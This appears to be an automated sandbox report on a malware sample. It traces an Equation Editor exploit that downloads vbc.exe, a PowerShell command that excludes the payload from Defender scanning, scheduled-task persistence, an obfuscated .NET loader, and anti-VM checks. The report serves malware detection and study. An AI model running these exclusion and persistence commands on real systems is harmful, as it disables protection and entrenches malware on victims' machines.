Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7........<......................0.......G.........}.....".......................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................G...............(.P.....................X........<......................0.......G.........}.............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................S...............(.P.....................X.......F<......................0.......S.......................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................S...............(.P.....................X.......c<......................0.......S.........}.............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................_.......t.z.i...e.x.e...................X........<......................0......._.........}.............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................_...............(.P.....................X........<......................0......._.........}.............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................k...............(.P.....................X........<......................0.......k.......................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................k...............(.P..............................<......................0.......k.........}.............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w.........}.....2.......................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................w...............(.P.....................x.......F=......................0.......w.........}.............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................x.......t=......................0.......................l.......................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................X........=......................0.................}.............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......(.P.....................X........=......................0.................}.............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................x........=......................0.................}.............................	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Console Write: ................`.......................(.P.............H.......X.......~:................................................................).....	Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dDqpEdJEtzi.exe
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dDqpEdJEtzi" /XML "C:\Users\user\AppData\Local\Temp\tmp7282.tmp
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\mstsc.exe C:\Windows\SysWOW64\mstsc.exe
Source: C:\Windows\SysWOW64\mstsc.exe	Process created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe C:\Program Files (x86)\Mozilla Firefox\Firefox.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dDqpEdJEtzi.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dDqpEdJEtzi" /XML "C:\Users\user\AppData\Local\Temp\tmp7282.tmp	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Process created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe C:\Program Files (x86)\Mozilla Firefox\Firefox.exe	Jump to behavior

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR6F84.tmp

Jump to behavior

Source: C:\Windows\SysWOW64\mstsc.exe

Code function: 11_2_000D33C0 CoInitialize,CoCreateInstance,OleUninitialize,

11_2_000D33C0

Source: C:\Users\Public\vbc.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\Public\vbc.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000009.00000003.997655136.00000000006E0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.1070445189.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.996323896.0000000000580000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.1070186270.0000000000870000.00000040.00000800.00020000.00000000.sdmp, mstsc.exe
Source:	Binary string: mstsc.pdb source: vbc.exe, 00000009.00000002.1070927704.0000000001140000.00000040.10000000.00040000.00000000.sdmp, vbc.exe, 00000009.00000003.1067795163.0000000001140000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.1068222397.0000000002C30000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: vbc[1].exe.2.dr, IceCreamManager/View/MainForm.cs	.Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: vbc.exe.2.dr, IceCreamManager/View/MainForm.cs	.Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: dDqpEdJEtzi.exe.4.dr, IceCreamManager/View/MainForm.cs	.Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 4.2.vbc.exe.1260000.1.unpack, IceCreamManager/View/MainForm.cs	.Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 4.0.vbc.exe.1260000.0.unpack, IceCreamManager/View/MainForm.cs	.Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 9.0.vbc.exe.1260000.6.unpack, IceCreamManager/View/MainForm.cs	.Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 9.0.vbc.exe.1260000.2.unpack, IceCreamManager/View/MainForm.cs	.Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 9.2.vbc.exe.1260000.4.unpack, IceCreamManager/View/MainForm.cs	.Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 9.0.vbc.exe.1260000.0.unpack, IceCreamManager/View/MainForm.cs	.Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])

.NET source code contains method to dynamically call methods (often used by packers)

Source: vbc[1].exe.2.dr, IceCreamManager/View/MainForm.cs	.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
Source: vbc.exe.2.dr, IceCreamManager/View/MainForm.cs	.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
Source: dDqpEdJEtzi.exe.4.dr, IceCreamManager/View/MainForm.cs	.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
Source: 4.2.vbc.exe.1260000.1.unpack, IceCreamManager/View/MainForm.cs	.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
Source: 4.0.vbc.exe.1260000.0.unpack, IceCreamManager/View/MainForm.cs	.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
Source: 9.0.vbc.exe.1260000.6.unpack, IceCreamManager/View/MainForm.cs	.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
Source: 9.0.vbc.exe.1260000.2.unpack, IceCreamManager/View/MainForm.cs	.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
Source: 9.2.vbc.exe.1260000.4.unpack, IceCreamManager/View/MainForm.cs	.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
Source: 9.0.vbc.exe.1260000.0.unpack, IceCreamManager/View/MainForm.cs	.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)

Source: C:\Users\Public\vbc.exe	Code function: 4_2_002EEA40 push esp; retf 002Dh	4_2_002EEA41
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00409023 push esi; iretd	9_2_0040902F
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00416B91 push edx; retf	9_2_00416B92
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00417423 push es; retf	9_2_00417424
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0041D672 push eax; ret	9_2_0041D678
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0041D67B push eax; ret	9_2_0041D6E2
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0041D625 push eax; ret	9_2_0041D678
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0041D6DC push eax; ret	9_2_0041D6E2
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_025CDFA1 push ecx; ret	11_2_025CDFB4
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_000C9023 push esi; iretd	11_2_000C902F

Source: initial sample	Static PE information: section name: .text entropy: 7.63421102824
Source: initial sample	Static PE information: section name: .text entropy: 7.63421102824
Source: initial sample	Static PE information: section name: .text entropy: 7.63421102824

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Roaming\dDqpEdJEtzi.exe	Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_03690401 URLDownloadToFileW,ShellExecuteExW,ExitProcess,

2_2_03690401

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\Public\vbc.exe

Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dDqpEdJEtzi" /XML "C:\Users\user\AppData\Local\Temp\tmp7282.tmp

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: 4.2.vbc.exe.27da9ec.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.998332695.0000000002721000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.998529663.00000000027CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 1200, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: vbc.exe, 00000004.00000002.998332695.0000000002721000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.998529663.00000000027CF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: vbc.exe, 00000004.00000002.998332695.0000000002721000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.998529663.00000000027CF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 0000000000408C04 second address: 0000000000408C0A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 0000000000408F9E second address: 0000000000408FA4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\mstsc.exe	RDTSC instruction interceptor: First address: 00000000000C8C04 second address: 00000000000C8C0A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\mstsc.exe	RDTSC instruction interceptor: First address: 00000000000C8F9E second address: 00000000000C8FA4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1344	Thread sleep time: -420000s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 1704	Thread sleep time: -45733s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 1476	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 1472	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2428	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe

Last function: Thread delayed

Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
